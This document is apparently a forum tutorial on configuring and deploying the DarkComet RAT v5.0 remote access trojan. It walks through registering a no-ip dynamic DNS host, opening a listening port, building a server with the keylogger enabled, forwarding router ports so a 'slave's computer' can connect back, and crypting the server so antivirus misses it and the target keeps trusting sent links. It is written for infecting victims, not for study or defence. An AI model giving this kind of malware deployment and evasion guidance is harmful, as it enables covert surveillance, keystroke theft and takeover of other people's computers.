I'm in a good mood today, so I think I'll make a guide on how to set up your DarkComet RAT v5.0
First, you'll need to download the Required Software
NO-IP DUC
DARKCOMET RAT V5.0
SANDBOXIE (Direct Download)
Step 1: Setting up your no-ip
(If you already have your NO-IP account and DNS set up, skip to step 2)
Go to no-ip.com and click "Create Account" on the right side of the page.
Click the "Sign Up" box under Free DNS.
Fill out all of your information, and click on "I Accept, Create My Account" at the bottom of the page.
You can exit out of no-ip.com now, and go to your e-mail account to get your account conformation link. Follow the link provided, then click on any of the four links to the no-ip.com home page. Log in again if you aren't already.
Then, click on Hosts/Redirects at the top left of the page. Finally, go to " Add a Host" by clicking it at the top of the page, or following the hyperlink that I just provided.
Fill out the information as follows:
NOTE: Do not change the IP Address.
Step 2: Enabling your NO-IP DUC
Open up the NO-IP DUC which you downloaded at the beginning of this tutorial and click "Select Hosts."
Make sure that the DNS you created has a √ beside it and click "Save."
Step 3: Personalizing DarkComet
Open up your DarkComet RAT v5.0. Click on the orange {DarkComet-RAT} button and select "Listen to new port (+Listen)." Input the port that you would like to port forward and click "listen." For this tutorial, I'll be using port 1010.
Click on the {DarkComet-RAT} button again, but this time, choose "Client Settings," and then select NO-IP Updater. Close the Client Settings window, and you should see the NO-IP UPdater. Input your NO-IP information and click "Update DNS."
Step 4: Setting up your DarkComet server
Surprisingly, this may be the easiest step. Once again, click on the orange {DarkComet-RAT} button. Choose Server Module this time. Copy exactly the information in the following images.
1) Main Settings
Leave the security pasword blank, and the box unchecked
Hit the "Generate" button 5 or more times
Uncheck the FWB (Firewall Bypass) box
2) Network Settings
Type your DNS name into the correct text box
Input your port number into the correct text box
Click on "Add this configuration"
3) Module Startup, Install Message, and Module Shield
leave everything blank in all three of these tabs
4) Keylogger
Make sure that the first box is checked
5) Hosts File, Choose Icon, Add Plugins, and File Binder
leave all of the blank
you will add an icon when you crypt your server
Most crypters also include the ability to bind files
6) Build Module
check the checkbox for "Save profile settings after build"
Click "Build Server"
Save the server whereever you would like
Step 5: Finishing up
You will need to portfoward your router so that data can be sent from a slave's computer to your computer. Use this site for help on portforwarding. It involves nearly every type and version of router and is extremely helpful.
You will also need to crypt your server file. If your server isn't crypted, anti-virus software will easily detect it as a trojan and your target will no longer trust any links you give them.
